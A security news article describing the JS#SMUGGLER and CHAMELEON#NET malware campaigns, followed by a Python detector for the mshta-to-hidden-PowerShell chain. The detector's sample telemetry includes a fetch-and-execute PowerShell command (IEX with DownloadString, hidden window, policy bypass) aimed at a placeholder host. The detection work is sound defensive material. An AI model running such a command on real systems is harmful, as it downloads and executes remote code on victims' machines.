Malicious JavaScript and PowerShell Used to Compromise Enterprise Systems

Blending into infrastructure.
David Eberly
Contributing Writer

A new malware campaign named JS#SMUGGLER is being used to compromise enterprise users through infected websites that silently deploy the NetSupport Remote Access Trojan (RAT).

According to Securonix researchers, this campaign uses multi-layered execution methods involving obfuscated JavaScript, device-aware redirects, HTML Applications (HTA), and in-memory PowerShell scripts to bypass traditional antivirus and monitoring systems.

The result is full attacker control over the target system with minimal forensic evidence left behind.

In a separate operation named CHAMELEON#NET, attackers use phishing emails and malicious archives to install the Formbook malware, a known keylogger and information stealer. This infection chain relies on heavily obfuscated scripts, a .NET-based loader, and fileless deployment methods.

These two campaigns illustrate how modern malware authors continue to adapt and build on known delivery methods while introducing new layers of evasion to bypass existing defenses.

Why It Matters: Attackers are continuing to exploit known tools to create difficult-to-detect malware chains. Their use of legitimate infrastructure, such as compromised websites and common Windows utilities, increases the likelihood of successful infections and decreases the chance of early detection by traditional security tools.

  • Device-Aware JavaScript Loaders Deliver Targeted Malware Payloads: JS#SMUGGLER uses compromised websites to run a JavaScript loader that profiles the visiting system and determines the next stage of attack based on whether the device is a desktop or mobile. On mobile devices, the victim may be redirected to a fake full-screen page, while desktop users receive a remote script designed to advance the infection chain. The loader includes logic to activate the attack only once per device, reducing visibility and limiting the chance that the malicious code is noticed by automated scanners or security teams reviewing logs.
  • HTA Files and PowerShell Scripts Enable Fileless Malware Execution: After the JavaScript loader triggers the next step, an HTA payload is retrieved and run using mshta.exe, a legitimate Windows utility. This HTA file acts as a secondary loader, which in turn writes a PowerShell stager to disk, decrypts it, and executes it directly in memory. By avoiding persistent files and minimizing on-disk activity, the malware can evade endpoint detection tools and make evidence recovery more difficult. The HTA file also minimizes user-facing activity by disabling visible elements and running in a hidden state.
  • NetSupport RAT Provides Complete Control to Attackers Once Deployed: The final payload in the JS#SMUGGLER campaign is NetSupport RAT, a remote access tool that grants the attacker the ability to interact with the system in real time. Capabilities include remote desktop access, uploading and downloading files, capturing keystrokes, executing commands, and using the infected machine as a proxy. Because NetSupport RAT is a legitimate remote management tool, it may not be flagged as malicious by some security products unless deployed in suspicious ways, which adds to its appeal for cybercriminals.
  • CHAMELEON#NET Uses Malspam and .NET Loaders to Deliver Formbook: The CHAMELEON#NET campaign begins with phishing emails targeting users in government and social services. Victims are tricked into downloading an archive file that contains an obfuscated JavaScript dropper. This dropper writes multiple files to the system, including a .NET loader and a Java archive, each of which contains an embedded payload. The .NET component decrypts and loads the Formbook malware entirely in memory using reflection, avoiding the creation of a detectable executable. Once active, Formbook logs keystrokes, steals credentials, and can exfiltrate sensitive files.
  • Tactics Reduce Detection Rates: Both malware campaigns use layered obfuscation and advanced scripting to delay analysis and reduce detection. Persistence is maintained through registry edits or startup folder placement, allowing the malware to remain active across system reboots. These tactics demonstrate ongoing efforts by threat actors to make forensic analysis harder and reduce the effectiveness of traditional security software.
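As an added example (not from the Securonix report or this article), the detection logic below scores process-creation telemetry for the mshta.exe-to-PowerShell hand-off described in the JS#SMUGGLER chain: mshta.exe launched against a remote HTA, and PowerShell spawned by mshta.exe with the flag combination typical of hidden, in-memory stagers. The event fields and sample lines are constructed, Sysmon-style approximations, and the URLs are placeholders.

```python
"""Flag the mshta.exe -> hidden PowerShell chain in process-creation events.
Event schema and sample telemetry are constructed assumptions, not data
from the report; .invalid hostnames are placeholders."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent process image name
    image: str     # child process image name
    cmdline: str   # child command line


# Constructed sample telemetry: two malicious-looking events, three benign.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default"),
    ProcEvent("chrome.exe", "mshta.exe", "mshta.exe https://cdn.example.invalid/stage.hta"),
    ProcEvent("mshta.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -c IEX((New-Object "
              "Net.WebClient).DownloadString('https://cdn.example.invalid/s'))"),
    ProcEvent("explorer.exe", "mshta.exe", "mshta.exe C:\\Tools\\local_panel.hta"),
    ProcEvent("services.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
]

# mshta.exe given an http(s) URL rather than a local .hta path.
REMOTE_HTA = re.compile(r"mshta\.exe\s+\"?https?://", re.I)
# Switches that, in combination, characterise non-interactive in-memory stagers.
STAGER_FLAGS = re.compile(
    r"-(w|win|windowstyle)\s+hidden|-e(nc|ncodedcommand)?\b|-ep\s+bypass|\bIEX\b|DownloadString",
    re.I)


def score_event(ev):
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    if ev.image.lower() == "mshta.exe" and REMOTE_HTA.search(ev.cmdline):
        reasons.append("mshta fetching remote HTA")
    if ev.image.lower() == "powershell.exe":
        if ev.parent.lower() == "mshta.exe":
            reasons.append("powershell spawned by mshta")
        hits = {m.group(0).lower() for m in STAGER_FLAGS.finditer(ev.cmdline)}
        if len(hits) >= 2:   # one flag alone is common in admin scripts
            reasons.append("stager-style flags: " + ", ".join(sorted(hits)))
    return reasons


def detect(events):
    """Return (event, reasons) pairs for every event that scored."""
    return [(ev, r) for ev in events if (r := score_event(ev))]
```

Pairing the parent/child check with the flag check keeps a lone `-w hidden` in a scheduled maintenance script from alerting, while the full chain still scores on two independent reasons.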

Go Deeper -> Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT – The Hacker News
